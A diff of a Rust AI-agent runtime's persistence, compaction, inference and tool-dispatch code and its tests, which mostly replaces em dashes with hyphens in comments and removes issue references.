     /// Serialized [`InteractionPointState`](crate::interaction_points::InteractionPointState)
     /// for an agent parked at a stage-boundary interaction point (e.g. plan_approval),
     /// written to `interactions.json` so a restart re-presents the same prompt rather
-    /// than dropping it and re-inferring (issue #38). `None` ⇒ the agent isn't parked
+    /// than dropping it and re-inferring. `None` ⇒ the agent isn't parked
     /// at an interaction point (any stale file is removed).
     pub interactions: Option<String>,
 }

--- a/crates/leviath-runtime/src/persistence_bridge.rs
+++ b/crates/leviath-runtime/src/persistence_bridge.rs
@@ -6,7 +6,7 @@
 //! files under `<runs_dir>/<run_id>/` **one at a time**, so writes for a given
 //! agent never race or land out of order. Each file is written to a temp path and
 //! atomically renamed into place, so a concurrent reader (the dashboard) never
-//! sees a half-written file. All errors are logged and swallowed — persistence is
+//! sees a half-written file. All errors are logged and swallowed - persistence is
 //! best-effort and must never stall or fail the world.
 
 use std::path::{Path, PathBuf};
@@ -49,8 +49,8 @@ pub struct PersistJob {
 /// The single-lane persistence worker: writes each [`PersistJob`]'s files under
 /// `runs_dir`, one at a time, until the job channel closes (world shutdown).
 ///
-/// It also owns this daemon's run-ownership identity — a stable per-machine id
-/// (`<runs_dir>/../machine-id`, created once) and a per-process `world_id` — which
+/// It also owns this daemon's run-ownership identity - a stable per-machine id
+/// (`<runs_dir>/../machine-id`, created once) and a per-process `world_id` - which
 /// it stamps into every run's portable archive so a run copied to another machine
 /// is unambiguously attributable (see [`leviath_core::run_archive`]).
 pub async fn persistence_worker(runs_dir: PathBuf, mut jobs: UnboundedReceiver<PersistJob>) {
@@ -75,7 +75,7 @@ pub async fn persistence_worker(runs_dir: PathBuf, mut jobs: UnboundedReceiver<P
 }
 
 /// Whether a run status is fully terminal (no further snapshots expected).
-/// `CompleteInteractive` is excluded — such an agent stays live for follow-up.
+/// `CompleteInteractive` is excluded - such an agent stays live for follow-up.
 fn is_terminal_run(status: &leviath_core::run_meta::RunStatus) -> bool {
     use leviath_core::run_meta::RunStatus;
     matches!(
@@ -84,7 +84,7 @@ fn is_terminal_run(status: &leviath_core::run_meta::RunStatus) -> bool {
     )
 }
 
-/// A short opaque id derived from the current time + pid. Not cryptographic — it
+/// A short opaque id derived from the current time + pid. Not cryptographic - it
 /// only needs to distinguish concurrent daemons/runs on a shared filesystem.
 fn generate_id() -> String {
     use std::hash::{Hash, Hasher};
@@ -190,13 +190,13 @@ async fn write_snapshot(
 /// The context window (the bulk) is stored as a diff between writes:
 /// - **new archive** (file absent): preamble + a `Header` (identity + metadata)
 ///   + a full `ContextCheckpoint` the diffs rebase on;
-/// - **resumed** (file present, but this worker has no prior context for the run
-///   — e.g. after a daemon restart): an `OwnershipChanged` recording this
+/// - **resumed** (file present, but this worker has no prior context for the
+///   run, e.g. after a daemon restart): an `OwnershipChanged` recording this
 ///   world/machine took over + a fresh `ContextCheckpoint` re-anchor;
 /// - **ongoing** (a prior context is known): a compact `Progress` step carrying
 ///   the updated metadata + a `ContextDiff` since the previous point.
 ///
-/// The archive always folds to the run's latest resumable state. Best-effort —
+/// The archive always folds to the run's latest resumable state. Best-effort -
 /// a failed write is logged and swallowed like the rest of the persistence lane.
 async fn append_run_archive(
     dir: &Path,
@@ -276,7 +276,7 @@ async fn append_run_archive(
 /// Append one line (with a trailing newline) to `stages/<idx>/<file>` under the
 /// run dir, creating the stage directory if needed. Best-effort: a failed
 /// `create_dir_all` just makes the subsequent open fail, and the append write
-/// result is intentionally ignored — persistence must never stall the world.
+/// result is intentionally ignored - persistence must never stall the world.
 async fn append_stage_line(run_dir: &Path, stage_idx: usize, file: &str, line: &str, run_id: &str) {
     let stage_dir = run_dir.join("stages").join(stage_idx.to_string());
     let _ = tokio::fs::create_dir_all(&stage_dir).await;
@@ -708,7 +708,7 @@ mod tests {
     #[tokio::test]
     async fn write_is_skipped_when_runs_dir_unwritable() {
         crate::test_support::with_tracing(|| {});
-        // runs_dir points at a *file*, so create_dir_all fails — must not panic.
+        // runs_dir points at a *file*, so create_dir_all fails - must not panic.
         let file = tempfile::NamedTempFile::new().unwrap();
         write_snapshot(
             file.path(), // a file, not a dir

--- a/crates/leviath-runtime/src/pipeline/compaction.rs
+++ b/crates/leviath-runtime/src/pipeline/compaction.rs
@@ -20,7 +20,7 @@ pub struct AwaitingCompaction;
 #[derive(Resource)]
 pub struct CompactionResults(pub UnboundedReceiver<CompactionOutcome>);
 
-/// The eviction threshold (fraction of budget) at which compaction kicks in —
+/// The eviction threshold (fraction of budget) at which compaction kicks in -
 /// the same 0.9 the imperative `evict_and_compact` uses.
 pub(crate) const EVICTION_THRESHOLD: f32 = 0.9;
 
@@ -31,7 +31,7 @@ pub(crate) const EVICTION_THRESHOLD: f32 = 0.9;
 /// acquire a permit for the compaction model, spawn the job, and hold the agent
 /// as `AwaitingCompaction`. Anything that can't proceed (under threshold, nothing
 /// to summarize, provider missing, pool full) simply leaves the agent
-/// `ReadyToInfer` so inference proceeds — compaction is best-effort. (Ported from
+/// `ReadyToInfer` so inference proceeds - compaction is best-effort. (Ported from
 /// `AgentEngine::evict_and_compact`.)
 #[allow(clippy::type_complexity)]
 pub fn dispatch_compaction(
@@ -47,14 +47,14 @@ pub fn dispatch_compaction(
     for (entity, state, mut window, settings) in agents.iter_mut() {
         crate::tick_scope::enter(entity);
         if state.status != AgentStatus::Active {
-            continue; // paused / waiting / cancelled — don't start new work
+            continue; // paused / waiting / cancelled - don't start new work
         }
         if !window.needs_eviction(EVICTION_THRESHOLD) {
-            continue; // under threshold — nothing to do
+            continue; // under threshold - nothing to do
         }
         let target_free = window.max_tokens / 10;
         let Ok(eviction) = window.try_evict(target_free) else {
-            continue; // couldn't evict — proceed to inference as-is
+            continue; // couldn't evict - proceed to inference as-is
         };
 
         // Build a summarize request per region that both needs compaction and
@@ -87,10 +87,10 @@ pub fn dispatch_compaction(
         }
 
         let Some(provider) = providers.0.get(&config.provider) else {
-            continue; // compaction provider not registered — skip, non-fatal
+            continue; // compaction provider not registered - skip, non-fatal
         };
         let Some(permit) = stage.pools.try_acquire(&config.model) else {
-            continue; // pool full — skip compaction this round
+            continue; // pool full - skip compaction this round
         };
 
         stage.runtime.spawn(run_compaction_job(
@@ -189,7 +189,7 @@ pub(crate) fn compaction_request(
 #[derive(Component, Debug, Clone)]
 pub struct PendingEdgeCompact(pub Vec<String>);
 
-/// Whether a region kind is "stage-specific" — eligible for an edge transform to
+/// Whether a region kind is "stage-specific" - eligible for an edge transform to
 /// clear or compact. The always-preserved kinds (pinned identity, compaction
 /// history, hashmap stores) are never touched.
 pub(crate) fn is_stage_specific(kind: &leviath_core::RegionKind) -> bool {
@@ -280,7 +280,7 @@ pub fn dispatch_edge_compact(
     for (entity, state, window, pending, settings) in agents.iter_mut() {
         crate::tick_scope::enter(entity);
         if state.status != AgentStatus::Active {
-            continue; // paused / waiting / cancelled — don't start new work
+            continue; // paused / waiting / cancelled - don't start new work
         }
         let started = settings
             .and_then(|s| {

--- a/crates/leviath-runtime/src/pipeline/inference.rs
+++ b/crates/leviath-runtime/src/pipeline/inference.rs
@@ -6,7 +6,7 @@ use super::*;
 /// `InferenceConfig::batch_tool_hint` is set. Identical across every agent,
 /// stage, and run, so it is a stable cache prefix (`CacheHint::Always`). It tells
 /// the model it may emit several `tool_use` blocks per response and should batch
-/// *independent* operations — while explicitly forbidding batching of dependent
+/// *independent* operations - while explicitly forbidding batching of dependent
 /// ones. See issue #17.
 pub(crate) const BATCH_TOOL_HINT: &str = "You can call multiple tools in a single response. \
 When operations are independent (reading, editing, or writing different files, or \
@@ -98,7 +98,7 @@ pub(crate) fn retry_policy_for(
 
 /// The cancellation handles for an agent's currently in-flight async work (its
 /// inference request, its tool batch). Attached when the work is dispatched,
-/// removed when it lands — so the presence of this component means "there is
+/// removed when it lands - so the presence of this component means "there is
 /// something running for this agent that a cancel needs to stop".
 ///
 /// Without it, cancelling only stopped *new* work from being dispatched: a
@@ -145,7 +145,7 @@ pub(crate) fn track_in_flight(
 /// Inference-dispatch system: for every `ReadyToInfer` agent, resolve its
 /// provider and, **if a per-model permit is free**, build the request, spawn the
 /// inference job, and move it to `AwaitingInference`. If its provider is missing
-/// or no slot is free, it stays `ReadyToInfer` and is retried on a later tick —
+/// or no slot is free, it stays `ReadyToInfer` and is retried on a later tick -
 /// no blocking, no wasted task.
 #[allow(clippy::type_complexity)]
 pub fn dispatch_inference(
@@ -171,8 +171,8 @@ pub fn dispatch_inference(
     //
     // This is the one system whose per-agent body runs off the driver thread, so
     // the thread-local `tick_scope` can't carry an entity back to the catcher.
-    // Each agent's share runs under `run_agent_parallel`, which catches there —
-    // where the entity is known — and marks that agent for `tick` to fail
+    // Each agent's share runs under `run_agent_parallel`, which catches there -
+    // where the entity is known - and marks that agent for `tick` to fail
     // (issue #109). Clearing the thread-local keeps a panic in the fan-out
     // machinery *itself* unattributed rather than blamed on whichever agent a
     // previous system left recorded.
@@ -182,13 +182,13 @@ pub fn dispatch_inference(
         .for_each(|(entity, state, window, config, si, in_flight)| {
             crate::tick_scope::run_agent_parallel(entity, &par_commands, &mut || {
                 if state.status != AgentStatus::Active {
-                    return; // paused / waiting / cancelled — don't start new work
+                    return; // paused / waiting / cancelled - don't start new work
                 }
                 let Some(provider) = providers.0.get(&si.provider_name) else {
-                    return; // provider not registered — leave ready, retry later
+                    return; // provider not registered - leave ready, retry later
                 };
                 let Some(permit) = stage.pools.try_acquire(&si.model) else {
-                    return; // pool full — leave ready, retry next tick
+                    return; // pool full - leave ready, retry next tick
                 };
                 let request = build_request(window, config, si, &provider);
                 let job = InferenceJob {

--- a/crates/leviath-runtime/src/pipeline/inference.rs
+++ b/crates/leviath-runtime/src/pipeline/inference.rs
@@ -7,7 +7,7 @@ use super::*;
 /// stage, and run, so it is a stable cache prefix (`CacheHint::Always`). It tells
 /// the model it may emit several `tool_use` blocks per response and should batch
 /// *independent* operations - while explicitly forbidding batching of dependent
-/// ones. See issue #17.
+/// ones.
 pub(crate) const BATCH_TOOL_HINT: &str = "You can call multiple tools in a single response. \
 When operations are independent (reading, editing, or writing different files, or \
 writing a file then running a command that doesn't need its output), batch them in \

--- a/crates/leviath-runtime/src/pipeline/messaging.rs
+++ b/crates/leviath-runtime/src/pipeline/messaging.rs
@@ -10,7 +10,7 @@ pub struct MessageIntake(pub UnboundedReceiver<AgentMessage>);
 
 /// Message-delivery system: route inbound messages to their target agents'
 /// inboxes (by agent id), then deliver each inbox into the agent's context
-/// window — but only for agents whose current stage accepts messages; otherwise
+/// window - but only for agents whose current stage accepts messages; otherwise
 /// the messages wait in the inbox for a stage that does. Ported from
 /// `AgentEngine::process_messages` / `deliver_inbox_messages`.
 pub fn deliver_messages(

--- a/crates/leviath-runtime/src/pipeline/mod.rs
+++ b/crates/leviath-runtime/src/pipeline/mod.rs
@@ -78,7 +78,7 @@ pub struct StageJustEntered {
 // ─── Per-agent stage data the dispatch system reads ──────────────────────────
 
 /// Resolved inference parameters for the agent's current stage, set when it
-/// enters that stage. Pure data — the dispatch system reads it to build the
+/// enters that stage. Pure data - the dispatch system reads it to build the
 /// request.
 #[derive(Component, Debug, Clone)]
 pub struct StageInference {
@@ -112,10 +112,10 @@ pub struct InferenceStage {
     /// agent turn).
     pub transition_outcomes: UnboundedSender<InferenceOutcome>,
     /// Where completed *compaction* jobs (LLM context summarization) are
-    /// reported — again a separate lane so a summary isn't mistaken for a turn.
+    /// reported - again a separate lane so a summary isn't mistaken for a turn.
     pub compaction_outcomes: UnboundedSender<crate::compaction_bridge::CompactionOutcome>,
     /// Where completed *content-summary transform* jobs are reported (the
-    /// Summarize context-transform lane — see [`crate::context_transform`]).
+    /// Summarize context-transform lane - see [`crate::context_transform`]).
     pub content_summary_outcomes: UnboundedSender<crate::compaction_bridge::CompactionOutcome>,
     /// Signalled when an inference completes, to wake the tick loop.
     pub wake: Arc<Notify>,

--- a/crates/leviath-runtime/src/pipeline/persist.rs
+++ b/crates/leviath-runtime/src/pipeline/persist.rs
@@ -208,7 +208,7 @@ pub fn dispatch_persistence(
         // (test / `lev run`); a zero-subscriber `send` error is ignored.
         if let Some(sink) = &sink {
             for (_idx, line) in output_appends.iter().chain(log_appends.iter()) {
-                // `Res<T>` derefs to `T` in bevy_ecs 0.19; it is no longer a tuple struct.
+                // `Res<T>` derefs to `T` in bevy_ecs 0.19; it is not a tuple struct.
                 let _ = sink.0.send(crate::host::WorldEvent::Log {
                     run_id: md.run_id.clone(),
                     agent_id: state.agent_id.clone(),

--- a/crates/leviath-runtime/src/pipeline/persist.rs
+++ b/crates/leviath-runtime/src/pipeline/persist.rs
@@ -33,7 +33,7 @@ pub struct PersistenceStage(pub UnboundedSender<PersistJob>);
 /// Persistence-dispatch system: for each agent carrying run metadata whose
 /// (iteration, stage, status) has changed since its last snapshot, build the
 /// `meta.json` + `context.json` value snapshot and hand it to the persistence
-/// lane. Fire-and-forget — no result to collect; the single-worker lane keeps a
+/// lane. Fire-and-forget - no result to collect; the single-worker lane keeps a
 /// given agent's writes ordered. Agents without [`RunMetadata`] aren't persisted.
 #[allow(clippy::type_complexity)]
 /// Interaction-status reflection system: mirror the shared [`InteractionHub`]'s
@@ -41,7 +41,7 @@ pub struct PersistenceStage(pub UnboundedSender<PersistJob>);
 /// the dashboard / `lev ps` surface its prompt) instead of a silent `Active`.
 ///
 /// An agent's `ask_user_*` / tool-approval / plan-approval call blocks deep in
-/// the async tool lane, invisible to the ECS — which otherwise leaves the agent
+/// the async tool lane, invisible to the ECS - which otherwise leaves the agent
 /// `Active` with meta.json written `running`, so the dashboard (gated on
 /// `WaitingInput`) never shows the prompt and the run looks frozen. This system
 /// closes that gap: an agent whose id has an open hub request flips
@@ -244,13 +244,13 @@ pub fn dispatch_persistence(
         });
         // A parent parked mid fan-out: persist its waiting state so the
         // split/merge resumes after a restart (removed once it's no longer
-        // waiting — see the writer).
+        // waiting - see the writer).
         let fanout = fan_out_waiting
             .map(|w| serde_json::to_string(&w.to_state()).expect("FanOutState always serializes"));
         // An agent parked at a stage-boundary interaction point: persist the open
         // point (cursor/round + the reviewed document) so a restart re-presents the
         // same prompt rather than dropping it and re-inferring (issue #38). The
-        // document comes from the open request in the hub — which is present by the
+        // document comes from the open request in the hub - which is present by the
         // time `reflect_interaction_status` (running just before this system) has
         // flipped the agent to `Waiting`. If the request isn't registered yet, skip
         // this tick; the next persist captures it (removing any stale sidecar).

--- a/crates/leviath-runtime/src/pipeline/response.rs
+++ b/crates/leviath-runtime/src/pipeline/response.rs
@@ -163,7 +163,7 @@ pub struct StageProgress {
     /// another pass. Bounded by the gate's `max_attempts`.
     pub gate_reentries: usize,
     /// Unix seconds of the first tick this agent was ready to infer in the
-    /// stage — the clock a `stuck_after_minutes` threshold reads. Stamped
+    /// stage - the clock a `stuck_after_minutes` threshold reads. Stamped
     /// lazily by [`detect_stuck_stage`] so spawn, `enter_stage` and
     /// [`force_transition`] all get a fresh clock from the `Default` reset
     /// without threading a clock through their signatures.
@@ -195,7 +195,7 @@ pub enum StageOutcome {
 /// seeded at spawn (names + `Pending`) and reconciled by [`dispatch_persistence`]
 /// (status + timestamps), with per-stage tokens accrued by [`collect_inference`].
 /// Serialized to `stages.json` so the dashboard / serve API can show every
-/// stage's real name and status — not just the active one (whose name is the only
+/// stage's real name and status - not just the active one (whose name is the only
 /// one carried in `meta.json`).
 #[derive(Component, Debug, Clone)]
 pub struct StageLedger(pub Vec<leviath_core::run_meta::StageRecord>);
@@ -216,7 +216,7 @@ pub struct StageIoBuffer {
 /// Process-response system: route each `ProcessResponse` agent by whether its
 /// last inference asked for tools. Tool calls present ⇒ `ReadyForTools` (and the
 /// stage's running tool-call count is bumped); none ⇒ `ReadyForTransition`. Pure
-/// routing — no I/O.
+/// routing - no I/O.
 #[allow(clippy::type_complexity)]
 pub fn process_response(
     mut agents: Query<
@@ -272,12 +272,12 @@ pub(crate) const MAX_TEXT_ONLY_NUDGES: usize = 3;
 /// Whether this stage's deliverable *is* its text response.
 ///
 /// A stage with interaction points presents what it writes for the user to
-/// approve, revise or edit — the text is the work product, not a model stalling
+/// approve, revise or edit - the text is the work product, not a model stalling
 /// before it starts. Nudging one is worse than wasteful: the nudge says "use
 /// your tools to complete the task", and a stage built to produce a document
 /// usually has no tool that could. A planning stage told to complete the task
 /// went looking for a way to write the file, found none, and asked the user to
-/// grant it a write tool or create the file by hand — instead of ending the
+/// grant it a write tool or create the file by hand - instead of ending the
 /// stage and presenting the plan it had already finished writing.
 pub(crate) fn stage_output_is_reviewed(bp: &AgentBlueprint, cursor: &StageCursor) -> bool {
     matches!(
@@ -293,7 +293,7 @@ pub(crate) fn stage_output_is_reviewed(bp: &AgentBlueprint, cursor: &StageCursor
 /// "use your tools" nudge are added to context and the agent loops back to
 /// `ReadyToInfer`. Ported from `AgentEngine::loop_handle_empty_tool_calls`.
 ///
-/// A stage whose output is reviewed is never nudged — see
+/// A stage whose output is reviewed is never nudged - see
 /// `stage_output_is_reviewed`.
 #[allow(clippy::type_complexity)]
 pub fn handle_empty_response(

--- a/crates/leviath-runtime/src/pipeline/tests.rs
+++ b/crates/leviath-runtime/src/pipeline/tests.rs
@@ -137,7 +137,7 @@ fn build_request_passes_through_extra_params() {
 }
 
 /// A window whose pinned region carries a real entry, so `assemble` yields a
-/// non-empty `system` — required for the batch-hint tests to actually iterate
+/// non-empty `system` - required for the batch-hint tests to actually iterate
 /// the assembled blocks (an empty `system` would skip every closure).
 fn window_with_sys() -> ContextWindow {
     let mut w = window();
@@ -531,8 +531,8 @@ fn run_abort(world: &mut World) {
 }
 
 /// `track_in_flight` accumulates rather than replaces, so an agent that has
-/// something outstanding when a second job is dispatched keeps both handles
-/// — dropping the first would make that job uncancellable.
+/// something outstanding when a second job is dispatched keeps both handles -
+/// dropping the first would make that job uncancellable.
 #[test]
 fn track_in_flight_accumulates_across_dispatches() {
     fn add_one(agents: Query<(Entity, Option<&InFlightWork>)>, mut commands: Commands) {
@@ -609,7 +609,7 @@ fn abort_terminal_work_leaves_a_running_agent_alone() {
 
 /// A response that lands after the run was cancelled is discarded. The
 /// dispatch guard stops *new* inferences, but one already in flight still
-/// returns — and applying it advanced the run to `ProcessResponse`, from
+/// returns - and applying it advanced the run to `ProcessResponse`, from
 /// which it carried on as if nothing had happened.
 #[test]
 fn collect_inference_drops_a_response_for_a_cancelled_run() {
@@ -1014,7 +1014,7 @@ fn dispatch_persistence_broadcasts_buffered_lines_as_log_events() {
 
     run_dispatch_persistence(&mut world);
 
-    // Output lines stream first, then operational logs — each as a `Log`
+    // Output lines stream first, then operational logs - each as a `Log`
     // carrying the agent's run/agent ids and the raw line.
     let first = sink_rx.try_recv().expect("output log event");
     assert_eq!(
@@ -1353,7 +1353,7 @@ fn collect_drops_outcome_for_non_awaiting_agent() {
 
     run_collect(&mut world);
 
-    // Untouched — the stale outcome was dropped.
+    // Untouched - the stale outcome was dropped.
     assert_eq!(world.get::<AgentState>(e).unwrap().iteration, 0);
     assert!(world.get::<ProcessResponse>(e).is_none());
 }
@@ -1394,7 +1394,7 @@ fn collect_inference_accumulates_token_totals() {
 // ── process-response routing ──
 
 /// An inference result, paired with the advertisement that makes its call
-/// legal — see [`infer_with`]. `false` yields no calls and so offers
+/// legal - see [`infer_with`]. `false` yields no calls and so offers
 /// nothing, which is what a stage with no tools looks like.
 fn infer_result(with_tools: bool) -> (StageInference, crate::components::InferenceResult) {
     let offers = offering(match with_tools {
@@ -1602,8 +1602,8 @@ fn empty_response_finishes_after_max_nudges() {
 
 /// A stage that presents its output for review is finished when it produces
 /// that output. This is the whole failure, from a real run: `plan` wrote a
-/// complete plan on its first turn — correctly, with no tool calls, because
-/// writing the plan *is* the job — and the nudge read that as a model
+/// complete plan on its first turn - correctly, with no tool calls, because
+/// writing the plan *is* the job - and the nudge read that as a model
 /// stalling and told it to "use your tools to complete the task". `plan`
 /// has no tool that writes anything, so the model went looking for one,
 /// could not find it, and asked the user to grant it a write tool or create
@@ -1636,7 +1636,7 @@ fn empty_response_never_nudges_a_stage_whose_output_is_reviewed() {
         0,
         "and not counted as a nudge"
     );
-    // Nothing was injected — the model is not told to go do work it has no
+    // Nothing was injected - the model is not told to go do work it has no
     // tool for, which is what sent it asking the user for one.
     assert!(
         world
@@ -2018,7 +2018,7 @@ fn offering(names: &[&str]) -> StageInference {
 }
 
 /// An inference result **and** the advertisement that makes its own calls
-/// legal — dispatch refuses a tool the stage never offered, so a fixture
+/// legal - dispatch refuses a tool the stage never offered, so a fixture
 /// that calls one has to offer it. Returned together as a bundle so every
 /// test exercising some *other* part of dispatch is not restating its own
 /// call list. Tests about the Layer-1 check itself build the two separately.
@@ -2092,7 +2092,7 @@ async fn dispatch_tools_applies_all_context_inline() {
 
 /// The text dispatch left in the agent's conversation for the model to read.
 /// A batch with no lane work is applied inline, so there is no
-/// `ContextToolResults` to inspect — the window is the only record.
+/// `ContextToolResults` to inspect - the window is the only record.
 fn conversation_text(world: &World, e: Entity) -> String {
     world
         .get::<ContextWindow>(e)
@@ -2111,7 +2111,7 @@ fn conversation_text(world: &World, e: Entity) -> String {
 /// it. `available_tools` was applied when building the schema list and never
 /// again, so the call was dispatched anyway and the *user* was asked to
 /// approve writing code from the planning stage. It never reaches the lane
-/// or the permission gate now — the model is told, and the turn continues.
+/// or the permission gate now - the model is told, and the turn continues.
 #[tokio::test]
 async fn dispatch_tools_refuses_a_tool_the_stage_never_offered() {
     let (jtx, mut jrx) = mpsc::unbounded_channel();
@@ -2184,7 +2184,7 @@ async fn dispatch_tools_tells_a_toolless_stage_to_answer_directly() {
 }
 
 /// Aliases resolve on both sides. A manifest says `bash` and the model calls
-/// `shell` (or the reverse) — matching the raw strings would refuse a tool
+/// `shell` (or the reverse) - matching the raw strings would refuse a tool
 /// the stage plainly granted, which is a worse failure than the one this
 /// check exists to prevent.
 #[tokio::test]
@@ -2221,7 +2221,7 @@ async fn dispatch_tools_matches_an_offered_tool_through_its_alias() {
 }
 
 /// `tool_filter` narrows what a request advertises, so it has to narrow what
-/// dispatch accepts too — otherwise the filtered-out tool is callable by
+/// dispatch accepts too - otherwise the filtered-out tool is callable by
 /// name, which is the exact hole this check closes one level up.
 #[tokio::test]
 async fn dispatch_tools_honours_the_stage_tool_filter() {
@@ -2245,7 +2245,7 @@ async fn dispatch_tools_honours_the_stage_tool_filter() {
 }
 
 /// An empty `tool_filter` means "no narrowing", matching the request
-/// builder — not "nothing is allowed".
+/// builder - not "nothing is allowed".
 #[tokio::test]
 async fn dispatch_tools_treats_an_empty_tool_filter_as_no_narrowing() {
     let (jtx, mut jrx) = mpsc::unbounded_channel();
@@ -2525,7 +2525,7 @@ async fn dispatch_tools_falls_through_for_a_resolved_agents_unprompted_call() {
     // An agent still carrying GateResolved, with a call that is in neither
     // `approved` nor `denied` (it was allowed on the first pass and never
     // prompted), falls through the resolution bypass to the normal gate
-    // check — which allows the inbound `read_file` and sends it to the lane.
+    // check - which allows the inbound `read_file` and sends it to the lane.
     let (jtx, mut jrx) = mpsc::unbounded_channel();
     let mut world = World::new();
     world.insert_resource(ToolServiceRes(Arc::new(EchoService)));
@@ -2704,7 +2704,7 @@ fn apply_adds_assistant_turn_and_result_to_conversation() {
 
 #[test]
 fn apply_falls_back_when_region_missing() {
-    let mut w = ctx(&[]); // no "conversation" region — every add errors
+    let mut w = ctx(&[]); // no "conversation" region - every add errors
     // Exhausts the forced-add fallback to the placeholder without panicking.
     apply_tool_results(
         &mut w,
@@ -2771,7 +2771,7 @@ fn routing_away_pointer_previews_and_truncates_long_results() {
 fn routing_away_keeps_pair_in_conversation_and_text_in_region() {
     // Regression: routing a tool result to a knowledge region must keep the
     // tool_use/tool_result PAIR in `conversation` (a pointer) and store the full
-    // output in the region as TEXT — so assemble() produces a valid, orphan-free
+    // output in the region as TEXT - so assemble() produces a valid, orphan-free
     // message sequence (no ToolResult block outside conversation → no API 400;
     // no orphaned tool_use → no write-loop).
     let mut w = ContextWindow::new(100_000);
@@ -2951,7 +2951,7 @@ fn apply_no_truncation_when_result_under_max() {
         &mut w,
         "r",
         &[tc("c1", "read")],
-        &[("c1".to_string(), "short".to_string())], // 5 chars — under budget
+        &[("c1".to_string(), "short".to_string())], // 5 chars - under budget
         Some(&r),
         None,
     );
@@ -2985,7 +2985,7 @@ fn apply_truncates_to_available_when_region_nearly_full() {
         90,
     )
     .unwrap();
-    let big = "y".repeat(600); // ~150 tokens — won't fit the ~110 remaining
+    let big = "y".repeat(600); // ~150 tokens - won't fit the ~110 remaining
     apply_tool_results(
         &mut w,
         "r",
@@ -3144,7 +3144,7 @@ fn deliver_holds_for_non_accepting_agent() {
 
     run_deliver(&mut world);
 
-    // Not delivered — waits in the inbox for a stage that accepts messages.
+    // Not delivered - waits in the inbox for a stage that accepts messages.
     assert_eq!(world.get::<MessageInbox>(e).unwrap().messages.len(), 1);
     assert_eq!(
         world
@@ -4644,7 +4644,7 @@ fn detect_stuck_reports_same_file_churn_first() {
     assert!(reason.contains('4'), "got: {reason}");
 }
 
-/// The churn threshold must not fire when no file was edited at all —
+/// The churn threshold must not fire when no file was edited at all -
 /// `hottest_edit` is `None` and the next trigger takes over.
 #[test]
 fn detect_stuck_falls_through_churn_when_nothing_was_edited() {
@@ -4748,7 +4748,7 @@ fn note_stuck_prefers_the_stuck_report_region_then_conversation() {
         0
     );
 
-    // Blueprints that declare no stuck_report still get the diagnosis —
+    // Blueprints that declare no stuck_report still get the diagnosis -
     // every blueprint is required to declare `conversation`.
     let mut fallback = ctx(&[("conversation", 10_000)]);
     note_stuck(&mut fallback, "implement", "you are looping");
@@ -4922,7 +4922,7 @@ fn detect_stuck_stage_is_a_noop_without_an_available_stuck_edge() {
         Some(2),
         VisitCounts::default(),
     );
-    // (c) the escape hatch is spent — the agent must keep working the stage
+    // (c) the escape hatch is spent - the agent must keep working the stage
     //     (bounded by max_iterations) rather than be kicked out elsewhere.
     let mut spent = VisitCounts::default();
     spent.0.insert("b".to_string(), 5);
@@ -5045,7 +5045,7 @@ fn resolve_transition_routes_error_to_error_edge() {
 
 #[test]
 fn resolve_transition_errors_terminally_without_an_error_edge() {
-    // Stage 'a' has only an Always edge to 'b' — no error edge.
+    // Stage 'a' has only an Always edge to 'b' - no error edge.
     let a = stage_named(
         "a",
         Some(vec![("go".to_string(), plain_edge("b"))]),
@@ -5128,12 +5128,12 @@ fn resolve_transition_routes_stuck_down_the_stuck_edge() {
 }
 
 /// A stuck interrupt fires MID-stage, so when its escape edge is gone the
-/// agent must go back to work — falling through to a normal transition
+/// agent must go back to work - falling through to a normal transition
 /// would end a stage the agent never said it had finished (e.g. shunting
 /// `implement` into `review` with the work half-done).
 #[test]
 fn resolve_transition_resumes_the_stage_when_the_stuck_edge_is_gone() {
-    // Stage 'a' has only an ordinary edge to 'b' — no stuck edge at all,
+    // Stage 'a' has only an ordinary edge to 'b' - no stuck edge at all,
     // which is what an exhausted revisit budget looks like from here.
     let a = stage_named(
         "a",
@@ -5228,7 +5228,7 @@ fn unmet_required_regions_flags_empty_clears_when_filled_and_skips_without_tool(
 fn unmet_required_regions_skips_caller_input_seeded_regions() {
     // A required region whose content comes from the caller at spawn must NOT
     // be flagged by the agent-facing gate, even when empty and the stage can
-    // write context — the caller owns it, not the agent.
+    // write context - the caller owns it, not the agent.
     let region =
         leviath_core::layout::RegionDefinition::new("plan".to_string(), RegionKind::Pinned, 4000)
             .with_required(true, None)
@@ -5573,7 +5573,7 @@ fn resolve_transition_holds_the_stage_when_a_gate_blocks() {
         .map(|entry| entry.content.clone())
         .collect::<String>();
     assert!(conv.contains("[System] No file modifications"));
-    // Not yet forced — the budget hasn't run out.
+    // Not yet forced - the budget hasn't run out.
     assert_eq!(
         world
             .get::<crate::persistence::RunOutcomeFlags>(e)
@@ -5603,7 +5603,7 @@ fn resolve_transition_records_a_forced_gate_and_advances() {
         .insert(progress_with(0, 0, 3))
         .insert(crate::persistence::RunOutcomeFlags::default());
     // An agent with no flags component (fan-out workers, older runs) still
-    // transitions — it just has nowhere to record the forced gate.
+    // transitions - it just has nowhere to record the forced gate.
     let unflagged = spawn_transition_agent(
         &mut world,
         bp,
@@ -5958,7 +5958,7 @@ fn collect_tools_separates_failed_denied_and_non_modifying_calls() {
 /// A write the stage never offered is not a modification. It matters twice
 /// over: `modified_files` in `meta.json` would name a file that was never
 /// written, and `modifying_tool_calls` is what a `require_modifications`
-/// transition gate reads — so a stage that had every write refused could
+/// transition gate reads - so a stage that had every write refused could
 /// still answer "yes, I did work" on the way out.
 #[test]
 fn collect_tools_ignores_a_write_the_stage_never_offered() {
@@ -5979,7 +5979,7 @@ fn collect_tools_ignores_a_write_the_stage_never_offered() {
         &[],
     );
     assert_eq!(progress.modifying_tool_calls, 0);
-    // Not "blocked" either — nobody declined it; the stage never had it.
+    // Not "blocked" either - nobody declined it; the stage never had it.
     assert_eq!(progress.blocked_modification_calls, 0);
     assert_eq!(flags.modified_file_count, 0);
     assert!(flags.modified_files.is_empty());
@@ -6463,7 +6463,7 @@ fn collect_compaction_summary_for_unpaired_region_is_skipped() {
     tx.send(CompactionOutcome {
         entity: e,
         // "lone" exists but is unpaired (history None); "gone" doesn't exist
-        // at all (get_region_mut None) — both no-op branches.
+        // at all (get_region_mut None) - both no-op branches.
         result: Ok(vec![
             ("lone".to_string(), "s".to_string()),
             ("gone".to_string(), "s2".to_string()),
@@ -6606,7 +6606,7 @@ async fn reflect_flips_active_to_waiting_and_back_when_prompt_clears() {
 #[tokio::test]
 async fn reflect_does_not_flip_a_non_active_agent_with_an_open_prompt() {
     // A terminal agent that happens to still have an open hub entry is left
-    // as-is (the inner `status == Active` guard) — no spurious Waiting.
+    // as-is (the inner `status == Active` guard) - no spurious Waiting.
